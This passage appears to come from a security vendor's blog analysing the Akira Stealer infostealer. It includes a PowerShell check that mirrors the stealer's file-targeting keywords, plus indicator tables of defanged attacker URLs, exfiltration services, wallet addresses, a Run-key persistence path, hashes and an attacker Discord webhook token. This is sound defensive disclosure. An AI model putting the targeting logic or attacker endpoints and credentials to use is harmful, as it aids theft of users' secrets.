DarkGray\n",[1524,17514,17515,17520,17525,17530,17534,17539,17544,17549,17554,17559,17564,17568,17573,17578,17583,17587,17592,17597,17601,17606,17611,17616,17621,17626,17630,17635,17640,17645,17649,17653,17658,17662,17667,17671,17676,17681,17686,17691,17696,17701,17706,17710,17715,17720,17725,17730,17735,17740,17745,17750,17755,17759,17764,17769,17773,17778,17783,17788,17793,17798,17803,17808,17813,17817,17821,17825,17830,17834,17839,17844,17849,17853,17858,17863,17868,17873,17878,17883,17888,17894,17899,17905,17910,17916,17922,17927,17932,17938],{"__ignoreMap":863},[1588,17516,17517],{"class":1590,"line":1591},[1588,17518,17519],{},"\u003C#\n",[1588,17521,17522],{"class":1590,"line":864},[1588,17523,17524],{},".SYNOPSIS\n",[1588,17526,17527],{"class":1590,"line":1814},[1588,17528,17529],{}," QuickCheck: Lists all files that Akira Stealer would potentially exfiltrate.\n",[1588,17531,17532],{"class":1590,"line":1831},[1588,17533,9865],{"emptyLinePlaceholder":508},[1588,17535,17536],{"class":1590,"line":2135},[1588,17537,17538],{},".DESCRIPTION\n",[1588,17540,17541],{"class":1590,"line":2141},[1588,17542,17543],{}," Scans Desktop, Documents, Downloads and OneDrive for files that:\n",[1588,17545,17546],{"class":1590,"line":2147},[1588,17547,17548],{}," • Contain one of the defined keywords in their name\n",[1588,17550,17551],{"class":1590,"line":2153},[1588,17552,17553],{}," • Have an allowed file extension\n",[1588,17555,17556],{"class":1590,"line":2159},[1588,17557,17558],{}," • Are not larger than 2 MB\n",[1588,17560,17561],{"class":1590,"line":2165},[1588,17562,17563],{}," Presents the results in a colored, tabular overview.\n",[1588,17565,17566],{"class":1590,"line":11039},[1588,17567,9865],{"emptyLinePlaceholder":508},[1588,17569,17570],{"class":1590,"line":11045},[1588,17571,17572],{},".NOTES\n",[1588,17574,17575],{"class":1590,"line":11051},[1588,17576,17577],{}," © glueckkanja AG – Kaiserstr. 39 · 63065 Offenbach\n",[1588,17579,17580],{"class":1590,"line":11057},[1588,17581,17582],{},"#>\n",[1588,17584,17585],{"class":1590,"line":11063},[1588,17586,9865],{"emptyLinePlaceholder":508},[1588,17588,17589],{"class":1590,"line":11069},[1588,17590,17591],{},"# -------------------------------------\n",[1588,17593,17594],{"class":1590,"line":11075},[1588,17595,17596],{},"# 1. Configuration\n",[1588,17598,17599],{"class":1590,"line":11081},[1588,17600,17591],{},[1588,17602,17603],{"class":1590,"line":11087},[1588,17604,17605],{},"$scanFolders = @(\n",[1588,17607,17608],{"class":1590,"line":11093},[1588,17609,17610],{}," \"$env:USERPROFILE\\Desktop\",\n",[1588,17612,17613],{"class":1590,"line":11099},[1588,17614,17615],{}," \"$env:USERPROFILE\\Documents\",\n",[1588,17617,17618],{"class":1590,"line":11105},[1588,17619,17620],{}," \"$env:USERPROFILE\\Downloads\",\n",[1588,17622,17623],{"class":1590,"line":11111},[1588,17624,17625],{}," \"$env:USERPROFILE\\OneDrive\"\n",[1588,17627,17628],{"class":1590,"line":11117},[1588,17629,11258],{},[1588,17631,17632],{"class":1590,"line":11123},[1588,17633,17634],{},"$keywords = 'passw','seed','mnemo','phrase','login','wallet','crypto','token','backup','secret','account'\n",[1588,17636,17637],{"class":1590,"line":11790},[1588,17638,17639],{},"$extensions = '.txt','.doc','.docx','.pdf','.csv','.xls','.xlsx','.jpg','.png'\n",[1588,17641,17642],{"class":1590,"line":11795},[1588,17643,17644],{},"$maxSize = 2MB\n",[1588,17646,17647],{"class":1590,"line":11800},[1588,17648,9865],{"emptyLinePlaceholder":508},[1588,17650,17651],{"class":1590,"line":11805},[1588,17652,17591],{},[1588,17654,17655],{"class":1590,"line":11811},[1588,17656,17657],{},"# 2. Scan and Collect Matches\n",[1588,17659,17660],{"class":1590,"line":11816},[1588,17661,17591],{},[1588,17663,17664],{"class":1590,"line":11821},[1588,17665,17666],{},"$matches = [System.Collections.Generic.List[PSObject]]::new()\n",[1588,17668,17669],{"class":1590,"line":11826},[1588,17670,9865],{"emptyLinePlaceholder":508},[1588,17672,17673],{"class":1590,"line":11831},[1588,17674,17675],{},"foreach ($folder in $scanFolders) {\n",[1588,17677,17678],{"class":1590,"line":11836},[1588,17679,17680],{}," if (-not (Test-Path $folder)) { continue }\n",[1588,17682,17683],{"class":1590,"line":11841},[1588,17684,17685],{}," Get-ChildItem -Path $folder -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {\n",[1588,17687,17688],{"class":1590,"line":11847},[1588,17689,17690],{}," # 2.1 Extension filter\n",[1588,17692,17693],{"class":1590,"line":11853},[1588,17694,17695],{}," if ($extensions -notcontains $_.Extension.ToLower()) { return }\n",[1588,17697,17698],{"class":1590,"line":11859},[1588,17699,17700],{}," # 2.2 Size filter\n",[1588,17702,17703],{"class":1590,"line":11864},[1588,17704,17705],{}," if ($_.Length -gt $maxSize) { return }\n",[1588,17707,17708],{"class":1590,"line":11869},[1588,17709,9865],{"emptyLinePlaceholder":508},[1588,17711,17712],{"class":1590,"line":11874},[1588,17713,17714],{}," # 2.3 Keyword filter: explicit loop to avoid null-method calls\n",[1588,17716,17717],{"class":1590,"line":11879},[1588,17718,17719],{}," $hit = $null\n",[1588,17721,17722],{"class":1590,"line":11885},[1588,17723,17724],{}," foreach ($kw in $keywords) {\n",[1588,17726,17727],{"class":1590,"line":11890},[1588,17728,17729],{}," if ($_.Name.ToLower().Contains($kw)) {\n",[1588,17731,17732],{"class":1590,"line":11895},[1588,17733,17734],{}," $hit = $kw\n",[1588,17736,17737],{"class":1590,"line":11900},[1588,17738,17739],{}," break\n",[1588,17741,17742],{"class":1590,"line":11905},[1588,17743,17744],{}," }\n",[1588,17746,17747],{"class":1590,"line":11910},[1588,17748,17749],{}," }\n",[1588,17751,17752],{"class":1590,"line":11915},[1588,17753,17754],{}," if (-not $hit) { return }\n",[1588,17756,17757],{"class":1590,"line":11921},[1588,17758,9865],{"emptyLinePlaceholder":508},[1588,17760,17761],{"class":1590,"line":11927},[1588,17762,17763],{}," # 2.4 Build relative path\n",[1588,17765,17766],{"class":1590,"line":11933},[1588,17767,17768],{}," $rel = $_.DirectoryName.Substring($env:USERPROFILE.Length + 1)\n",[1588,17770,17771],{"class":1590,"line":11939},[1588,17772,9865],{"emptyLinePlaceholder":508},[1588,17774,17775],{"class":1590,"line":11944},[1588,17776,17777],{}," # 2.5 Collect\n",[1588,17779,17780],{"class":1590,"line":11949},[1588,17781,17782],{}," $matches.Add([PSCustomObject]@{\n",[1588,17784,17785],{"class":1590,"line":11955},[1588,17786,17787],{}," FileName = $_.Name\n",[1588,17789,17790],{"class":1590,"line":11961},[1588,17791,17792],{}," Location = $rel\n",[1588,17794,17795],{"class":1590,"line":11967},[1588,17796,17797],{}," 'Size (KB)' = [math]::Round($_.Length / 1KB, 1)\n",[1588,17799,17800],{"class":1590,"line":11973},[1588,17801,17802],{}," Keyword = $hit\n",[1588,17804,17805],{"class":1590,"line":11978},[1588,17806,17807],{}," })\n",[1588,17809,17810],{"class":1590,"line":11983},[1588,17811,17812],{}," }\n",[1588,17814,17815],{"class":1590,"line":11989},[1588,17816,8430],{},[1588,17818,17819],{"class":1590,"line":11994},[1588,17820,9865],{"emptyLinePlaceholder":508},[1588,17822,17823],{"class":1590,"line":11999},[1588,17824,17591],{},[1588,17826,17827],{"class":1590,"line":12005},[1588,17828,17829],{},"# 3. Display Results\n",[1588,17831,17832],{"class":1590,"line":12011},[1588,17833,17591],{},[1588,17835,17836],{"class":1590,"line":12017},[1588,17837,17838],{},"clear\n",[1588,17840,17841],{"class":1590,"line":12022},[1588,17842,17843],{},"Write-Host \"🔍 glueckkanja AG – Akira Stealer QuickCheck\" -ForegroundColor Cyan\n",[1588,17845,17846],{"class":1590,"line":12028},[1588,17847,17848],{},"Write-Host \"────────────────────────────────────────────────────────\" -ForegroundColor DarkCyan\n",[1588,17850,17851],{"class":1590,"line":12034},[1588,17852,9865],{"emptyLinePlaceholder":508},[1588,17854,17855],{"class":1590,"line":12039},[1588,17856,17857],{},"if ($matches.Count -gt 0) {\n",[1588,17859,17860],{"class":1590,"line":12045},[1588,17861,17862],{}," $matches |\n",[1588,17864,17865],{"class":1590,"line":12051},[1588,17866,17867],{}," Sort-Object Location, FileName |\n",[1588,17869,17870],{"class":1590,"line":12056},[1588,17871,17872],{}," Format-Table -AutoSize `\n",[1588,17874,17875],{"class":1590,"line":12061},[1588,17876,17877],{}," @{Label='File'; Expression={$_.FileName}},\n",[1588,17879,17880],{"class":1590,"line":12066},[1588,17881,17882],{}," @{Label='Location'; Expression={$_.Location}},\n",[1588,17884,17885],{"class":1590,"line":12072},[1588,17886,17887],{}," @{Label='Size (KB)'; Expression={$_. 'Size (KB)'}},\n",[1588,17889,17891],{"class":1590,"line":17890},79,[1588,17892,17893],{}," @{Label='Keyword'; Expression={$_.Keyword}}\n",[1588,17895,17897],{"class":1590,"line":17896},80,[1588,17898,9865],{"emptyLinePlaceholder":508},[1588,17900,17902],{"class":1590,"line":17901},81,[1588,17903,17904],{}," Write-Host \"`n⚠️ Total potential matches: $($matches.Count)\" -ForegroundColor Yellow\n",[1588,17906,17908],{"class":1590,"line":17907},82,[1588,17909,8430],{},[1588,17911,17913],{"class":1590,"line":17912},83,[1588,17914,17915],{},"else {\n",[1588,17917,17919],{"class":1590,"line":17918},84,[1588,17920,17921],{}," Write-Host \"✅ No potentially compromised files found.\" -ForegroundColor Green\n",[1588,17923,17925],{"class":1590,"line":17924},85,[1588,17926,8430],{},[1588,17928,17930],{"class":1590,"line":17929},86,[1588,17931,9865],{"emptyLinePlaceholder":508},[1588,17933,17935],{"class":1590,"line":17934},87,[1588,17936,17937],{},"Write-Host \"`n© glueckkanja AG · Kaiserstr. 39 · 63065 Offenbach\" -ForegroundColor DarkGray\n",[1588,17939,17941],{"class":1590,"line":17940},88,[1588,17942,17943],{},"Write-Host \"Disclaimer: This tool offers a high-level scan based on Akira Stealer’s logic; it does not replace full forensic analysis.\" -ForegroundColor DarkGray\n",[1541,17945],{"className":17946},[6875,6876],[1511,17948,17950],{"id":17949},"_12-beyond-response-how-glueckkanja-csoc-turns-incidents-into-insights","12. Beyond Response – How glueckkanja CSOC Turns Incidents into Insights",[806,17952,816],{},[806,17954,17955,17956],{},"Most security operations centers stop at containment.\n",[1736,17957,17958],{},"We don’t.",[806,17960,17961],{},"At glueckkanja CSOC, we believe incident response isn’t the finish line—it’s the starting point.",[806,17963,17964],{},"When others declare victory and move on, we dive deeper. For us, each incident is an opportunity to learn, adapt, and become stronger. Our relentless curiosity, fueled by years of deep forensic expertise and reverse engineering capability, ensures we don’t just defend—we anticipate.",[806,17966,17967,17968,2786],{},"This philosophy is why we built the ",[1736,17969,17970],{},"Akira Compromise Reporter",[806,17972,17973],{},"Far beyond basic detection, this internally developed forensic tool uses our intimate knowledge of the Akira Stealer to provide absolute clarity on what data has been compromised. Within minutes, it produces a precise, actionable snapshot of the incident's full impact:",[2738,17975,17976,17979,17982],{},[2741,17977,17978],{},"Exactly which credentials, tokens, and browser sessions were stolen.",[2741,17980,17981],{},"Precisely which cryptocurrency wallets, messaging accounts, and files were exposed.",[2741,17983,17984],{},"A clear, structured, and detailed forensic report—transforming uncertainty into immediate, informed action.",[806,17986,17987],{},[1449,17988],{"alt":17989,"src":17990},"Akira Compromise Report","https://res.cloudinary.com/c4a8/image/upload/v1749796758/blog/pics/akira-compromise-report.png",[806,17992,17993],{},"Because at glueckkanja, we measure our success not just by threats blocked, but by clarity provided. ybersecurity, done right, isn’t about simply reacting to incidents—It’s about understanding, adapting, and always staying one step ahead.",[806,17995,17996],{},[1736,17997,17998],{},"That’s the glueckkanja CSOC difference.",[1511,18000,18002],{"id":18001},"_13-indicators-of-compromise-iocs","13. Indicators of Compromise (IOCs)",[806,18004,816],{},[806,18006,18007],{},"Below is a comprehensive, verbatim collection of IOCs extracted directly from the malware code during our internal reverse engineering process at glueckkanja CSOC. No assumptions or external threat intel sources were used — all indicators are confirmed findings. All URLs are deliberately obfuscated to prevent accidental clicks.",[806,18009,18010],{},[1736,18011,18012],{},"Abbreviations:",[2738,18014,18015,18021],{},[2741,18016,18017,18020],{},[1736,18018,18019],{},"TG:"," Telegram reporting channel",[2741,18022,18023,18026],{},[1736,18024,18025],{},"Alt:"," Alternate (fallback) endpoint",[810,18028,18030],{"id":18029},"_1-domains-urls","1. Domains & URLs",[806,18032,1536],{},[1902,18034,1905,18036],{"className":18035,"style":10692},[17110],[1923,18037,18038,1905,18050,1905,18063,1905,18076,1905,18089,1905,18102,1905,18115,1905,18128,1905,18144,1905,18160,1905,18173,1905,18186,1905,18199,1905,18212,1905,18225,1905,18238,1905,18251,1905,18264,1905,18277,1905,18290,1905,18304,1905,18317],{},[1911,18039,1909,18040,1909,18044,1909,18048,1905],{},[1915,18041,18043],{"style":18042},"text-align: left; width: 18%;","Category",[1915,18045,18047],{"style":18046},"text-align: left; width: 52%;","Obfuscated URL",[1915,18049,10868],{"style":10861},[1911,18051,1909,18052,1909,18055,1909,18060,1905],{},[1928,18053,18054],{},"Primary Injection",[1928,18056,18057],{},[1524,18058,18059],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/inj[.]php",[1928,18061,18062],{},"Initial attacker webhook endpoint",[1911,18064,1909,18065,1909,18068,1909,18073,1905],{"style":10717},[1928,18066,18067],{},"Fallback Injection",[1928,18069,18070],{},[1524,18071,18072],{},"https[:]//cosmoplanets[.]net/.well-known/pki-validation/inj[.]php",[1928,18074,18075],{},"Alternate injector endpoint",[1911,18077,1909,18078,1909,18081,1909,18086,1905],{},[1928,18079,18080],{},"Error Reporting (TG)",[1928,18082,18083],{},[1524,18084,18085],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/link[.]php",[1928,18087,18088],{},"Telegram error/log reporting URL",[1911,18090,1909,18091,1909,18094,1909,18099,1905],{"style":10717},[1928,18092,18093],{},"Error Reporting (Alt)",[1928,18095,18096],{},[1524,18097,18098],{},"https[:]//cosmoplanets[.]net/.well-known/pki-validation/link[.]php",[1928,18100,18101],{},"Alternate error/log reporting URL",[1911,18103,1909,18104,1909,18107,1909,18112,1905],{},[1928,18105,18106],{},"Vanity Bot (TG)",[1928,18108,18109],{},[1524,18110,18111],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/mumu[.]php",[1928,18113,18114],{},"Vanity address notification endpoint",[1911,18116,1909,18117,1909,18120,1909,18125,1905],{"style":10717},[1928,18118,18119],{},"Vanity Bot (Alt)",[1928,18121,18122],{},[1524,18123,18124],{},"https[:]//cosmoplanets[.]net/well-known/pki-validation/mumu[.]php",[1928,18126,18127],{},"Alternate vanity notification endpoint",[1911,18129,1909,18130,1909,18133,1909,18138,1905],{},[1928,18131,18132],{},"Exodus Injection",[1928,18134,18135],{},[1524,18136,18137],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/exodus[.]asar",[1928,18139,18140,18141,18143],{},"Electron ",[1524,18142,10598],{}," app module",[1911,18145,1909,18146,1909,18149,1909,18154,1905],{"style":10717},[1928,18147,18148],{},"Atomic Injection",[1928,18150,18151],{},[1524,18152,18153],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/atomic[.]asar",[1928,18155,18140,18156,18159],{},[1524,18157,18158],{},"AtomicWallet"," module",[1911,18161,1909,18162,1909,18165,1909,18170,1905],{},[1928,18163,18164],{},"Updater Download",[1928,18166,18167],{},[1524,18168,18169],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/Updater[.]exe",[1928,18171,18172],{},"Persistence dropper executable",[1911,18174,1909,18175,1909,18178,1909,18183,1905],{"style":10717},[1928,18176,18177],{},"Gofile API List",[1928,18179,18180],{},[1524,18181,18182],{},"https[:]//api.gofile[.]io/servers",[1928,18184,18185],{},"Retrieves best GoFile upload server",[1911,18187,1909,18188,1909,18191,1909,18196,1905],{},[1928,18189,18190],{},"Discord Token Check",[1928,18192,18193],{},[1524,18194,18195],{},"https[:]//discordapp[.]com/api/v9/users/@me",[1928,18197,18198],{},"Validates stolen Discord token",[1911,18200,1909,18201,1909,18204,1909,18209,1905],{"style":10717},[1928,18202,18203],{},"Discord Billing Info",[1928,18205,18206],{},[1524,18207,18208],{},"https[:]//discord[.]com/api/users/@me/billing/payment-sources",[1928,18210,18211],{},"Retrieves billing methods",[1911,18213,1909,18214,1909,18217,1909,18222,1905],{},[1928,18215,18216],{},"Google OAuth Replay",[1928,18218,18219],{},[1524,18220,18221],{},"https[:]//accounts[.]google[.]com/oauth/multilogin",[1928,18223,18224],{},"Replays stolen Google session tokens",[1911,18226,1909,18227,1909,18230,1909,18235,1905],{"style":10717},[1928,18228,18229],{},"IP Check (hosting)",[1928,18231,18232],{},[1524,18233,18234],{},"http[:]//ip-api[.]com/line/?fields=hosting",[1928,18236,18237],{},"Hosting environment detection",[1911,18239,1909,18240,1909,18243,1909,18248,1905],{},[1928,18241,18242],{},"IP Lookup (geo)",[1928,18244,18245],{},[1524,18246,18247],{},"http[:]//ip-api[.]com/json/{ip}",[1928,18249,18250],{},"Geolocation by IP",[1911,18252,1909,18253,1909,18256,1909,18261,1905],{"style":10717},[1928,18254,18255],{},"Public IP Retrieval",[1928,18257,18258],{},[1524,18259,18260],{},"https[:]//api[.]ipify[.]org",[1928,18262,18263],{},"Fetches external IP address",[1911,18265,1909,18266,1909,18269,1909,18274,1905],{},[1928,18267,18268],{},"File.io Upload",[1928,18270,18271],{},[1524,18272,18273],{},"https[:]//file[.]io/",[1928,18275,18276],{},"Secondary exfiltration channel",[1911,18278,1909,18279,1909,18282,1909,18287,1905],{"style":10717},[1928,18280,18281],{},"Oshi.at Upload",[1928,18283,18284],{},[1524,18285,18286],{},"http[:]//oshi[.]at/",[1928,18288,18289],{},"Tertiary exfiltration channel",[1911,18291,1909,18292,1909,18295,1909,18301,1905],{},[1928,18293,18294],{},"JS Dropper Primary",[1928,18296,18297],{},[833,18298,18300],{"href":18299,"target":513},"https://rentry.co/7vzd22fg36hfdd33/raw","https[:]//rentry[.]co/7vzd22fg36hfdd33/raw",[1928,18302,18303],{},"Remote reference to actual ZIP URL",[1911,18305,1909,18306,1909,18309,1909,18314,1905],{"style":10717},[1928,18307,18308],{},"JS Dropper Fallback 1",[1928,18310,18311],{},[833,18312,18313],{"href":9614,"target":513},"https[:]//cosmicdust[.]zip/.well-known/pki-validation/pyth.zip",[1928,18315,18316],{},"Alternative payload ZIP",[1911,18318,1909,18319,1909,18322,1909,18327,1905],{},[1928,18320,18321],{},"JS Dropper Fallback 2",[1928,18323,18324],{},[833,18325,18326],{"href":9619,"target":513},"https[:]//cosmoplanets[.]net/well-known/pki-validation/pyth.zip",[1928,18328,18329],{},"Secondary fallback payload ZIP",[1541,18331],{"className":18332},[6875,6876],[810,18334,18336],{"id":18335},"_2-cryptocurrency-addresses","2. Cryptocurrency Addresses",[806,18338,1536],{},[1902,18340,1905,18342],{"className":18341,"style":10692},[17110],[1923,18343,18344,1905,18352,1905,18362,1905,18372,1905,18382,1905,18391,1905,18401,1905,18411,1905,18421,1905,18431,1905,18441],{},[1911,18345,1909,18346,1909,18349,1905],{},[1915,18347,18348],{"style":17121},"Currency",[1915,18350,18351],{"style":10861},"Address",[1911,18353,1909,18354,1909,18357,1905],{},[1928,18355,18356],{},"BTC",[1928,18358,18359],{},[1524,18360,18361],{},"bc1qnmz2l8lr0yzj9eun48dyds7rlzg6t6hk5vw5zt",[1911,18363,1909,18364,1909,18367,1905],{"style":10717},[1928,18365,18366],{},"ETH",[1928,18368,18369],{},[1524,18370,18371],{},"0xa8a2C9e3fbCde807101dBD87aF7b51583f83d1D5",[1911,18373,1909,18374,1909,18377,1905],{},[1928,18375,18376],{},"DOGE",[1928,18378,18379],{},[1524,18380,18381],{},"DACeoqWDPmNARSZAeDZPFwqwecbByaksmd",[1911,18383,1909,18384,1909,18387,1905],{"style":10717},[1928,18385,18386],{},"LTC",[1928,18388,18389],{},[1524,18390,17151],{},[1911,18392,1909,18393,1909,18396,1905],{},[1928,18394,18395],{},"XMR",[1928,18397,18398],{},[1524,18399,18400],{},"4AVdkoC16zwcjxF4q9cXdL2D4vGqC9iPAcQ9gmHzQ7JS1fUUff6Za3D6CKm9MsDrhSDRY9hgeca7yKnMGpaD8dq6Bo3mT7D",[1911,18402,1909,18403,1909,18406,1905],{"style":10717},[1928,18404,18405],{},"BCH",[1928,18407,18408],{},[1524,18409,18410],{},"qrfs8ee558t0a2dlp9v6h4qzns5cd6pltqrrn883xs",[1911,18412,1909,18413,1909,18416,1905],{},[1928,18414,18415],{},"DASH",[1928,18417,18418],{},[1524,18419,18420],{},"XpeiSH1MfQYeehTfxosYHyTHzbgu2LNsG1",[1911,18422,1909,18423,1909,18426,1905],{"style":10717},[1928,18424,18425],{},"TRX",[1928,18427,18428],{},[1524,18429,18430],{},"TFuYQoosCUqbVjibowMqaa3W3h3RtAVDbK",[1911,18432,1909,18433,1909,18436,1905],{},[1928,18434,18435],{},"XRP",[1928,18437,18438],{},[1524,18439,18440],{},"r36AwwhUH7BRujevi5mukbDrG46KGbTk8V",[1911,18442,1909,18443,1909,18446,1905],{"style":10717},[1928,18444,18445],{},"XLM",[1928,18447,18448],{},[1524,18449,18450],{},"GAEPMD52PX7FYX65AJJLEFZSH3DZSL3DKM2XRXHVJP4CLJFIBKI25C33",[1541,18452],{"className":18453},[6875,6876],[810,18455,18457],{"id":18456},"_3-registry-keys-paths","3. Registry Keys / Paths",[806,18459,1536],{},[1902,18461,1905,18463],{"className":18462,"style":10692},[17110],[1923,18464,18465,1905,18472,1905,18482,1905,18492,1905,18505],{},[1911,18466,1909,18467,1909,18470,1905],{},[1915,18468,7683],{"style":18469},"text-align: left; width: 60%;",[1915,18471,7225],{"style":10861},[1911,18473,1909,18474,1909,18479,1905],{},[1928,18475,18476],{},[1524,18477,18478],{},"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc",[1928,18480,18481],{},"Checks for virtual GPU driver signature",[1911,18483,1909,18484,1909,18489,1905],{"style":10717},[1928,18485,18486],{},[1524,18487,18488],{},"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName",[1928,18490,18491],{},"Checks for virtual GPU provider name",[1911,18493,1909,18494,1909,18502,1905],{},[1928,18495,18496,18499,18500,2772],{},[1524,18497,18498],{},"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run"," (value ",[1736,18501,7694],{},[1928,18503,18504],{},"Persistence via Run key (Updater.exe)",[1911,18506,1909,18507,1909,18511,1905],{"style":10717},[1928,18508,18509],{},[1524,18510,7702],{},[1928,18512,18513],{},"Persistence Executable",[1541,18515],{"className":18516},[6875,6876],[810,18518,18520],{"id":18519},"_5-files-hashes","5. Files & Hashes",[806,18522,1536],{},[1902,18524,1905,18526],{"className":18525,"style":10692},[17110],[1923,18527,18528,1905,18539,1905,18551,1905,18563,1905,18576,1905,18588,1905,18600,1905,18612,1905,18624,1905,18637,1905,18649,1905,18662,1905,18674],{},[1911,18529,1909,18530,1909,18532,1909,18536,1905],{},[1915,18531,17454],{"style":18042},[1915,18533,18535],{"style":18534},"text-align: left; width: 62%;","SHA256",[1915,18537,18538],{"style":10861},"Size (bytes)",[1911,18540,1909,18541,1909,18543,1909,18548,1905],{},[1928,18542,7852],{},[1928,18544,18545],{},[1524,18546,18547],{},"331A4A4D721A1B5B1BB5E9A5C13462D5CDB16248DEFE0F16BE6E1E57C275E380",[1928,18549,18550],{},"63936274",[1911,18552,1909,18553,1909,18555,1909,18560,1905],{"style":10717},[1928,18554,6639],{},[1928,18556,18557],{},[1524,18558,18559],{},"C98F0F5B89C6DAC1482286FAA2E33A84230C26EA38DA4E013665582C9A04213B",[1928,18561,18562],{},"162036224",[1911,18564,1909,18565,1909,18568,1909,18573,1905],{},[1928,18566,18567],{},"jscrypter.js",[1928,18569,18570],{},[1524,18571,18572],{},"0A47985F8B3716058B0DF6C68EC97D0F1F3CB0F7A31562A819C3E766ED4CDCEF",[1928,18574,18575],{},"1429",[1911,18577,1909,18578,1909,18580,1909,18585,1905],{"style":10717},[1928,18579,8836],{},[1928,18581,18582],{},[1524,18583,18584],{},"1E666F3CF6E3DA6EED973E00E81EC721B33B17D4E981CB506F62F349DC1B3343",[1928,18586,18587],{},"30138",[1911,18589,1909,18590,1909,18592,1909,18597,1905],{},[1928,18591,8833],{},[1928,18593,18594],{},[1524,18595,18596],{},"E375DE29E23C43627B2894EA01B6B1C7D9B1BD37E7305EEC7185CEE9719924A7",[1928,18598,18599],{},"7155",[1911,18601,1909,18602,1909,18604,1909,18609,1905],{"style":10717},[1928,18603,8766],{},[1928,18605,18606],{},[1524,18607,18608],{},"972C634FD0666BCA12A6B7A50E69C32610321E9EC4D28D65734E55437D345CC6",[1928,18610,18611],{},"211",[1911,18613,1909,18614,1909,18616,1909,18621,1905],{},[1928,18615,6643],{},[1928,18617,18618],{},[1524,18619,18620],{},"850361AF7D6C006900FC638D6ACBD9A6362385BAD0530CFBD52555E6415DB3A4",[1928,18622,18623],{},"205210",[1911,18625,1909,18626,1909,18629,1909,18634,1905],{"style":10717},[1928,18627,18628],{},"exodus.asar",[1928,18630,18631],{},[1524,18632,18633],{},"6A3B5D5A6BA5925DF39351830D92A2B5E4720803FE9F8040C3E67C12F668F4EB",[1928,18635,18636],{},"132486332",[1911,18638,1909,18639,1909,18641,1909,18646,1905],{},[1928,18640,7911],{},[1928,18642,18643],{},[1524,18644,18645],{},"10E4A6B54CC0CF4D18DDE8B69E0B305ABE487E07ED990C5BFF82CE30B217B910",[1928,18647,18648],{},"28454",[1911,18650,1909,18651,1909,18654,1909,18659,1905],{"style":10717},[1928,18652,18653],{},"download.dat",[1928,18655,18656],{},[1524,18657,18658],{},"C49E83A5F154F7E54CA0CE9EECEA066A721966786F2850626252DDA0BE0BF79B",[1928,18660,18661],{},"21142",[1911,18663,1909,18664,1909,18666,1909,18671,1905],{},[1928,18665,8894],{},[1928,18667,18668],{},[1524,18669,18670],{},"E6F6AD49076367A58220E48691A34E33C18F0285FD9C50879A9B83A99F840AD7",[1928,18672,18673],{},"32375391",[1911,18675,1909,18676,1909,18678,1909,18683,1905],{"style":10717},[1928,18677,6635],{},[1928,18679,18680],{},[1524,18681,18682],{},"36C34E39DC7D54C4C97DDEB9B6C7FD429DB26C34D65CCE8BE3523FDFDB7CEBE0",[1928,18684,18685],{},"37652937",[1541,18687],{"className":18688},[6875,6876],[810,18690,18692],{"id":18691},"_5-discord-telegram-identifier","5. Discord & Telegram Identifier",[806,18694,1536],{},[1902,18696,1905,18698],{"className":18697,"style":10692},[17110],[1923,18699,18700,1905,18706,1905,18716,1905,18726],{},[1911,18701,1909,18702,1909,18704,1905],{},[1915,18703,18043],{"style":12313},[1915,18705,7442],{"style":10861},[1911,18707,1909,18708,1909,18711,1905],{},[1928,18709,18710],{},"Discord Webhook ID",[1928,18712,18713],{},[1524,18714,18715],{},"1226766972675428372",[1911,18717,1909,18718,1909,18721,1905],{"style":10717},[1928,18719,18720],{},"Discord Webhook Token",[1928,18722,18723],{},[1524,18724,18725],{},"BuBywdldEWncg7fbIpEhCROLpkGLkYirOoP2bP-uzzOatDaxSpaWqaLNerun85qCfwNz",[1911,18727,1909,18728,1909,18731,1905],{},[1928,18729,18730],{},"Telegram ID",[1928,18732,18733],{},[1524,18734,18735],{},"5035121855",[1541,18737],{"className":18738},[6875,6876],[1511,18740,18742],{"id":18741},"_14-reflecting-on-the-akira-stealer-incident-strengthening-your-defense-with-glueckkanja-csoc","14. Reflecting on the Akira Stealer Incident: Strengthening Your Defense with glueckkanja CSOC",[806,18744,816],{},[806,18746,18747],{},"Throughout this blog, we've explored the sophisticated nature of the Akira Infostealer—an advanced cyber threat characterized by targeted credential theft, stealthy data exfiltration, and persistent methods to evade traditional defenses. Understanding how this malware functions, the risks it poses, and the vulnerabilities it exploits is crucial in building a robust cybersecurity strategy.",[806,18749,18750],{},"The Akira Infostealer specifically targets sensitive data such as login credentials, browser sessions, cryptocurrency wallets, messaging services, and personal or organizational files. Its calculated and precise methods demand more than just standard security measures—they require continuous monitoring, in-depth forensic analysis, and proactive threat intelligence.",[806,18752,18753],{},"At glueckkanja CSOC, we leverage our deep technical expertise and advanced analytical capabilities to go beyond simple detection. Our specialized team continually monitors threats in real-time from our dedicated CSOC servers, enabling immediate identification, thorough investigation, and effective neutralization of threats like the Akira Infostealer.",[806,18755,18756],{},"But our work doesn’t stop at incident response. Every detected incident enriches our knowledge base, enhancing our security posture and ensuring we remain several steps ahead of future threats. With glueckkanja CSOC, you gain more than protection—you gain an adaptive security partner committed to your long-term resilience.",[806,18758,18759],{},"Take the next step in securing your organization's digital assets.",[806,18761,18762],{},"Contact glueckkanja's cybersecurity experts today, and let’s proactively secure your future together.",[806,18764,18765],{},[1736,18766,18767],{},"Empower your defense with glueckkanja CSOC.",[1511,18769,18771],{"id":18770},"_15-security-legal-disclaimer-use-of-real-malware-code","15. Security & Legal Disclaimer – Use of Real Malware Code",[806,18773,816],{},[806,18775,18776],{},"This publication contains detailed technical insights, including code excerpts and behavioral breakdowns derived from actual malicious software discovered during incident response and forensic investigations. The purpose of sharing this information is strictly educational, intended to help professional defenders understand, detect, and respond to real-world threats more effectively. We publish this in good faith and with the intent to contribute to the broader security community.",[806,18778,18779],{},"It is important to note that portions of the included code originate from threat actor toolkits and malware samples circulating in the wild. These fragments are not our intellectual property, nor are they to be considered safe, sanitized, or otherwise \"harmless.\" The reproduction or 